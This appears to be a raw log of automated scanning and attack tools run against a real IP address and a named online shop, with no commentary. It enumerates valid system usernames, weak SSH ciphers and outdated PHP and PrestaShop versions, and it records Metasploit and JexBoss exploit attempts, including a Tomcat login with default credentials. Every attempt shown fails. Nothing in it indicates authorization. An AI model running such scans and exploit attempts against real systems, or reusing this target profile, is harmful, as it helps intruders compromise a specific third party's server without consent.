- Nmap scan report for 91.121.2.184
- Host is up (0.12s latency).
- Not shown: 2 filtered ports
- PORT STATE SERVICE
- 53/udp open|filtered domain
- 67/udp open|filtered dhcps
- 68/udp open|filtered dhcpc
- 69/udp open|filtered tftp
- 88/udp open|filtered kerberos-sec
- 123/udp open|filtered ntp
- 139/udp open|filtered netbios-ssn
- 161/udp open|filtered snmp
- 162/udp open|filtered snmptrap
- 389/udp open|filtered ldap
- 520/udp open|filtered route
- 2049/udp open|filtered nfs
- Nmap done: 1 IP address (1 host up) scanned in 18.65 seconds
- #######################################################################################################################################
- # general
- (gen) banner: SSH-2.0-OpenSSH_5.3
- (gen) software: OpenSSH 5.3
- (gen) compatibility: OpenSSH 5.9-6.6, Dropbear SSH 2013.56+ (some functionality from 0.52)
- (gen) compression: enabled (zlib@openssh.com)
- # key exchange algorithms
- (kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
- `- [info] available since OpenSSH 4.4
- (kex) diffie-hellman-group-exchange-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0
- (kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
- (kex) diffie-hellman-group1-sha1 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled (in client) since OpenSSH 7.0, logjam attack
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- # host-key algorithms
- (key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
- (key) ssh-dss -- [fail] removed (in server) and disabled (in client) since OpenSSH 7.0, weak algorithm
- `- [warn] using small 1024-bit modulus
- `- [warn] using weak random number generator could reveal the key
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- # encryption algorithms (ciphers)
- (enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) aes192-ctr -- [info] available since OpenSSH 3.7
- (enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
- (enc) arcfour256 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) arcfour128 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 4.2
- (enc) aes128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.28
- (enc) 3des-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) blowfish-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [fail] disabled since Dropbear SSH 0.53
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 1.2.2, Dropbear SSH 0.28
- (enc) cast128-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [warn] using small 64-bit block size
- `- [info] available since OpenSSH 2.1.0
- (enc) aes192-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- (enc) aes256-cbc -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0, Dropbear SSH 0.47
- (enc) arcfour -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher
- `- [info] available since OpenSSH 2.1.0
- (enc) rijndael-cbc@lysator.liu.se -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using weak cipher mode
- `- [info] available since OpenSSH 2.3.0
- # message authentication code algorithms
- (mac) hmac-md5 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
- (mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
- `- [warn] using small 64-bit tag size
- `- [info] available since OpenSSH 4.7
- (mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
- (mac) hmac-ripemd160 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.5.0
- (mac) hmac-ripemd160@openssh.com -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [info] available since OpenSSH 2.1.0
- (mac) hmac-sha1-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.47
- (mac) hmac-md5-96 -- [fail] removed (in server) since OpenSSH 6.7, unsafe algorithm
- `- [warn] disabled (in client) since OpenSSH 7.2, legacy algorithm
- `- [warn] using encrypt-and-MAC mode
- `- [warn] using weak hashing algorithm
- `- [info] available since OpenSSH 2.5.0
- # algorithm recommendations (for OpenSSH 5.3)
- (rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group1-sha1 -- kex algorithm to remove
- (rec) -diffie-hellman-group-exchange-sha1 -- kex algorithm to remove
- (rec) -ssh-dss -- key algorithm to remove
- (rec) -arcfour -- enc algorithm to remove
- (rec) -rijndael-cbc@lysator.liu.se -- enc algorithm to remove
- (rec) -blowfish-cbc -- enc algorithm to remove
- (rec) -3des-cbc -- enc algorithm to remove
- (rec) -aes256-cbc -- enc algorithm to remove
- (rec) -arcfour256 -- enc algorithm to remove
- (rec) -cast128-cbc -- enc algorithm to remove
- (rec) -aes192-cbc -- enc algorithm to remove
- (rec) -arcfour128 -- enc algorithm to remove
- (rec) -aes128-cbc -- enc algorithm to remove
- (rec) -hmac-md5-96 -- mac algorithm to remove
- (rec) -hmac-ripemd160 -- mac algorithm to remove
- (rec) -hmac-sha1-96 -- mac algorithm to remove
- (rec) -umac-64@openssh.com -- mac algorithm to remove
- (rec) -hmac-md5 -- mac algorithm to remove
- (rec) -hmac-ripemd160@openssh.com -- mac algorithm to remove
- (rec) -hmac-sha1 -- mac algorithm to remove
- #######################################################################################################################################
- ftp is a valid user!
- mail is a valid user!
- mysql is a valid user!
- nobody is a valid user!
- postfix is a valid user!
- root is a valid user!
- #######################################################################################################################################
- libssh scanner 1.0.4
- Searching for Vulnerable Hosts...
- [*] 91.121.2.184:22 is not vulnerable to authentication bypass (SSH-2.0-OpenSSH_5.3)
- Scanner Completed Successfully
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:10 EST
- NSE: [ssh-run] Failed to specify credentials and command to run.
- Nmap scan report for 91.121.2.184
- Host is up (0.12s latency).
- PORT STATE SERVICE VERSION
- 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
- | ssh-auth-methods:
- | Supported authentication methods:
- | publickey
- | gssapi-keyex
- |_ gssapi-with-mic
- |_ssh-brute: Password authentication not allowed
- | ssh-hostkey:
- | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
- |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
- | ssh-publickey-acceptance:
- |_ Accepted Public Keys: No public keys accepted
- |_ssh-run: Failed to specify credentials and command to run.
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 2.6.32 - 3.1 (90%), Linux 3.11 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 8 hops
- TRACEROUTE (using port 22/tcp)
- HOP RTT ADDRESS
- 1 127.27 ms 10.251.200.1
- 2 127.56 ms 185.94.189.129
- 3 ...
- 4 138.51 ms 94.23.122.146
- 5 ...
- 6 137.53 ms 94.23.122.73
- 7 ...
- 8 137.39 ms 91.121.2.184
- #######################################################################################################################################
- USER_FILE => /brutex/wordlists/simple-users.txt
- RHOSTS => 91.121.2.184
- RHOST => 91.121.2.184
- [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
- [*] 91.121.2.184:22 - Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE.
- [-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: USER_FILE, KEY_FILE.
- [+] 91.121.2.184:22 - SSH server version: SSH-2.0-OpenSSH_5.3 ( service.version=5.3 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:5.3 service.protocol=ssh fingerprint_db=ssh.banner )
- [*] 91.121.2.184:22 - Scanned 1 of 1 hosts (100% complete)
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:11 EST
- Nmap scan report for 91.121.2.184
- Host is up (0.12s latency).
- PORT STATE SERVICE VERSION
- 67/udp open|filtered dhcps
- |_dhcp-discover: ERROR: Script execution failed (use -d to debug)
- Too many fingerprints match this host to give specific OS details
- Network Distance: 8 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 106.53 ms 10.251.200.1
- 2 106.59 ms 185.94.189.129
- 3 ...
- 4 117.88 ms 94.23.122.146
- 5 ...
- 6 116.62 ms 91.121.131.219
- 7 ...
- 8 116.71 ms 91.121.2.184
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:14 EST
- Nmap scan report for 91.121.2.184
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 68/udp open|filtered dhcpc
- Too many fingerprints match this host to give specific OS details
- Network Distance: 8 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 105.06 ms 10.251.200.1
- 2 117.37 ms 185.94.189.129
- 3 ...
- 4 116.58 ms 94.23.122.146
- 5 ...
- 6 115.16 ms 91.121.131.219
- 7 ...
- 8 115.21 ms 91.121.2.184
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:16 EST
- Nmap scan report for 91.121.2.184
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 69/udp open|filtered tftp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 8 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 104.27 ms 10.251.200.1
- 2 104.33 ms 185.94.189.129
- 3 ...
- 4 116.06 ms 94.23.122.146
- 5 ...
- 6 114.70 ms 91.121.131.219
- 7 ...
- 8 114.69 ms 91.121.2.184
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://91.121.2.184
- Generic Detection results:
- No WAF detected by the generic detection
- Number of requests: 14
- #######################################################################################################################################
- http://91.121.2.184 [302 Found] Country[FRANCE][FR], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[http://azulmania.es/], X-Powered-By[PHP/5.6.14]
- http://azulmania.es/ [301 Moved Permanently] Country[FRANCE][FR], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/], X-Powered-By[PHP/5.6.14]
- https://azulmania.es/ [302 Found] Apache, Country[FRANCE][FR], HTTPServer[Apache], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/es/], X-Powered-By[PHP/5.6.14]
- https://azulmania.es/es/ [200 OK] Apache, Cookies[PrestaShop-d617857eb8adf9da2917508ed07468ca], Country[FRANCE][FR], Google-Analytics[Universal][UA-31263279-1], HTML5, HTTPServer[Apache], HttpOnly[PrestaShop-d617857eb8adf9da2917508ed07468ca], IP[91.121.2.184], MetaGenerator[PrestaShop], PHP[5.6.14], PrestaShop, Script[text/javascript], Title[Azulmanía - Azulmanía], UncommonHeaders[powered-by], X-Powered-By[PHP/5.6.14]
- ######################################################################################################################################
- wig - WebApp Information Gatherer
- Scanning https://azulmania.es...
- _____________________ SITE INFO _____________________
- IP Title
- 91.121.2.184 Azulmanía - Azulmanía
- ______________________ VERSION ______________________
- Name Versions Type
- PrestaShop 1.6.1.1 CMS
- Apache Platform
- PHP 5.6.14 Platform
- openSUSE tumbleweed OS
- ____________________ INTERESTING ____________________
- URL Note Type
- /robots.txt robots.txt index Interesting
- _____________________________________________________
- Time: 48.8 sec Urls: 224 Fingerprints: 40401
- #######################################################################################################################################
- HTTP/1.1 302 Found
- Date: Wed, 07 Nov 2018 22:20:25 GMT
- X-Powered-By: PHP/5.6.14
- Location: http://azulmania.es/
- Vary: Accept-Encoding
- Content-Encoding: gzip
- Content-Length: 20
- Content-Type: text/html; charset=utf-8
- X-Pad: avoid browser bug
- Connection: keep-alive
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:20 EST
- Nmap scan report for 91.121.2.184
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 123/udp open|filtered ntp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 8 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 106.48 ms 10.251.200.1
- 2 106.51 ms 185.94.189.129
- 3 ...
- 4 117.78 ms 94.23.122.146
- 5 ...
- 6 116.75 ms 91.121.131.219
- 7 ...
- 8 116.52 ms 91.121.2.184
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:23 EST
- Nmap scan report for 91.121.2.184
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 161/tcp filtered snmp
- 161/udp open|filtered snmp
- Too many fingerprints match this host to give specific OS details
- Network Distance: 8 hops
- TRACEROUTE (using proto 1/icmp)
- HOP RTT ADDRESS
- 1 108.83 ms 10.251.200.1
- 2 190.00 ms 185.94.189.129
- 3 ...
- 4 119.80 ms 94.23.122.146
- 5 ...
- 6 113.27 ms 91.121.131.219
- 7 ...
- 8 113.18 ms 91.121.2.184
- #######################################################################################################################################
- Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:25 EST
- Nmap scan report for 91.121.2.184
- Host is up (0.11s latency).
- PORT STATE SERVICE VERSION
- 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
- | ldap-rootdse:
- | LDAP Results
- | <ROOT>
- | namingContexts:
- | supportedControl: 1.3.6.1.4.1.4203.666.5.18
- | supportedControl: 1.3.6.1.4.1.4203.1.9.1.1
- | supportedControl: 1.3.6.1.4.1.21008.108.63.1
- | supportedControl: 2.16.840.1.113730.3.4.18
- | supportedControl: 2.16.840.1.113730.3.4.2
- | supportedControl: 1.3.6.1.4.1.4203.666.5.12
- | supportedControl: 1.3.6.1.4.1.4203.666.5.2
- | supportedControl: 1.3.6.1.4.1.4203.1.10.1
- | supportedControl: 1.2.840.113556.1.4.1340
- | supportedControl: 1.2.840.113556.1.4.805
- | supportedControl: 1.2.840.113556.1.4.1413
- | supportedControl: 1.3.6.1.4.1.4203.666.5.15
- | supportedControl: 1.2.840.113556.1.4.1339
- | supportedControl: 1.2.840.113556.1.4.319
- | supportedControl: 1.2.826.0.1.3344810.2.3
- | supportedControl: 1.3.6.1.1.13.2
- | supportedControl: 1.3.6.1.1.13.1
- | supportedControl: 1.3.6.1.1.12
- | supportedExtension: 1.3.6.1.4.1.1466.20037
- | supportedExtension: 1.3.6.1.4.1.4203.1.11.1
- | supportedExtension: 1.3.6.1.4.1.4203.1.11.3
- | supportedExtension: 1.3.6.1.1.8
- | supportedLDAPVersion: 3
- | supportedSASLMechanisms: SCRAM-SHA-1
- | supportedSASLMechanisms: GSSAPI
- | supportedSASLMechanisms: DIGEST-MD5
- | supportedSASLMechanisms: OTP
- | supportedSASLMechanisms: CRAM-MD5
- |_ subschemaSubentry: cn=Subschema
- Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
- Aggressive OS guesses: Linux 2.6.32 (92%), Linux 2.6.32 - 3.1 (92%), Linux 3.10 (92%), Linux 3.2 (92%), Linux 3.4 - 3.10 (92%), Linux 3.8 (92%), Linux 2.6.32 - 3.10 (92%), Linux 2.6.32 - 3.13 (92%), Linux 2.6.32 - 3.9 (92%), Linux 3.11 (90%)
- No exact OS matches for host (test conditions non-ideal).
- Network Distance: 8 hops
- TRACEROUTE (using port 389/tcp)
- HOP RTT ADDRESS
- 1 103.68 ms 10.251.200.1
- 2 103.91 ms 185.94.189.129
- 3 ...
- 4 115.06 ms 94.23.122.146
- 5 ...
- 6 114.01 ms 91.121.131.219
- 7 ...
- 8 113.99 ms 91.121.2.184
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking https://91.121.2.184
- The site https://91.121.2.184 is behind a Imperva SecureSphere
- Number of requests: 9
- #######################################################################################################################################
- https://91.121.2.184 [302 Found] Apache, Country[FRANCE][FR], HTTPServer[Apache], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[http://azulmania.es/], X-Powered-By[PHP/5.6.14]
- http://azulmania.es/ [301 Moved Permanently] Country[FRANCE][FR], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/], X-Powered-By[PHP/5.6.14]
- https://azulmania.es/ [302 Found] Apache, Country[FRANCE][FR], HTTPServer[Apache], IP[91.121.2.184], PHP[5.6.14], RedirectLocation[https://azulmania.es/es/], X-Powered-By[PHP/5.6.14]
- https://azulmania.es/es/ [200 OK] Apache, Cookies[PrestaShop-d617857eb8adf9da2917508ed07468ca], Country[FRANCE][FR], Google-Analytics[Universal][UA-31263279-1], HTML5, HTTPServer[Apache], HttpOnly[PrestaShop-d617857eb8adf9da2917508ed07468ca], IP[91.121.2.184], MetaGenerator[PrestaShop], PHP[5.6.14], PrestaShop, Script[text/javascript], Title[Azulmanía - Azulmanía], UncommonHeaders[powered-by], X-Powered-By[PHP/5.6.14]
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- PluginSessionResumption
- PluginCertInfo
- PluginOpenSSLCipherSuites
- PluginCompression
- PluginChromeSha1Deprecation
- PluginHSTS
- PluginHeartbleed
- PluginSessionRenegotiation
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- 91.121.2.184:443 => 91.121.2.184:443
- SCAN RESULTS FOR 91.121.2.184:443 - 91.121.2.184:443
- ----------------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Session Renegotiation:
- Client-initiated Renegotiations: OK - Rejected
- Secure Renegotiation: OK - Supported
- * Certificate - Content:
- SHA1 Fingerprint: b9fb2f963ee488b751d1bc5303f98a1902d98391
- Common Name: azulmania.es
- Issuer: Let's Encrypt Authority X3
- Serial Number: 036C5368A46E57F0DB2D572C1E898A2E1A50
- Not Before: Oct 30 14:38:09 2018 GMT
- Not After: Jan 28 14:38:09 2019 GMT
- Signature Algorithm: sha256WithRSAEncryption
- Public Key Algorithm: rsaEncryption
- Key Size: 2048 bit
- Exponent: 65537 (0x10001)
- X509v3 Subject Alternative Name: {'DNS': ['azulmania.es']}
- * Certificate - Trust:
- Hostname Validation: FAILED - Certificate does NOT match 91.121.2.184
- Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
- Java 6 CA Store (Update 65): OK - Certificate is trusted
- Microsoft CA Store (09/2015): OK - Certificate is trusted
- Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
- Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
- Certificate Chain Received: ['azulmania.es', 'azulmania.es', "Let's Encrypt Authority X3"]
- * Certificate - OCSP Stapling:
- NOT SUPPORTED - Server did not send back an OCSP response.
- * Session Resumption:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Session Tickets: OK - Supported
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- SCAN COMPLETED IN 2.30 S
- ------------------------
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 91.121.2.184
- Testing SSL server 91.121.2.184 on port 443 using SNI name 91.121.2.184
- TLS Fallback SCSV:
- Server supports TLS Fallback SCSV
- TLS renegotiation:
- Secure session renegotiation supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- Supported Server Cipher(s):
- Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.2 128 bits RC4-SHA
- Preferred TLSv1.1 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.1 128 bits RC4-SHA
- Preferred TLSv1.0 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
- Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
- Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
- Accepted TLSv1.0 128 bits RC4-SHA
- SSL Certificate:
- Signature Algorithm: sha256WithRSAEncryption
- RSA Key Strength: 2048
- Subject: azulmania.es
- Altnames: DNS:azulmania.es
- Issuer: Let's Encrypt Authority X3
- Not valid before: Oct 30 14:38:09 2018 GMT
- Not valid after: Jan 28 14:38:09 2019 GMT
- #######################################################################################################################################
- ^ ^
- _ __ _ ____ _ __ _ _ ____
- ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
- | V V // o // _/ | V V // 0 // 0 // _/
- |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
- <
- ...'
- WAFW00F - Web Application Firewall Detection Tool
- By Sandro Gauci && Wendel G. Henrique
- Checking http://91.121.2.184:8080
- http://91.121.2.184:8080 [ Unassigned]
- Version: 1.11.12-static
- OpenSSL 1.0.2-chacha (1.0.2g-dev)
- Connected to 91.121.2.184
- Testing SSL server 91.121.2.184 on port 8080 using SNI name 91.121.2.184
- TLS Fallback SCSV:
- Server does not support TLS Fallback SCSV
- TLS renegotiation:
- Session renegotiation not supported
- TLS Compression:
- Compression disabled
- Heartbleed:
- TLS 1.2 not vulnerable to heartbleed
- TLS 1.1 not vulnerable to heartbleed
- TLS 1.0 not vulnerable to heartbleed
- #######################################################################################################################################
- RHOSTS => 91.121.2.184
- RHOST => 91.121.2.184
- [-] WAR file not found
- [*] Auxiliary module execution completed
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- RPORT => 8080
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] Attempting to connect to 91.121.2.184:8080
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] http://91.121.2.184:8080/admin/j_security_check - Checking j_security_check...
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [*] Scanned 1 of 1 hosts (100% complete)
- [*] Auxiliary module execution completed
- [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- USERNAME => tomcat
- PASSWORD => tomcat
- [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
- [*] Exploit completed, but no session was created.
- #######################################################################################################################################
- * --- JexBoss: Jboss verify and EXploitation Tool --- *
- | * And others Java Deserialization Vulnerabilities * |
- | |
- | @author: João Filho Matos Figueiredo |
- | @contact: joaomatosf@gmail.com |
- | |
- | @update: https://github.com/joaomatosf/jexboss |
- #______________________________________________________#
- @version: 1.2.4
- * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
- ** Checking Host: http://91.121.2.184:8080 **
- [*] Checking admin-console:
- * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: /admin-console//github.com/joaomatosf/jexboss (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
- [*] Checking Struts2:
- * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
- [*] Checking Servlet Deserialization:
- * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
- [*] Checking Application Deserialization:
- * An error occurred while connecting to the host http://91.121.2.184:8080 (HTTPConnectionPool(host='91.121.2.184', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
- [*] Checking Jenkins:
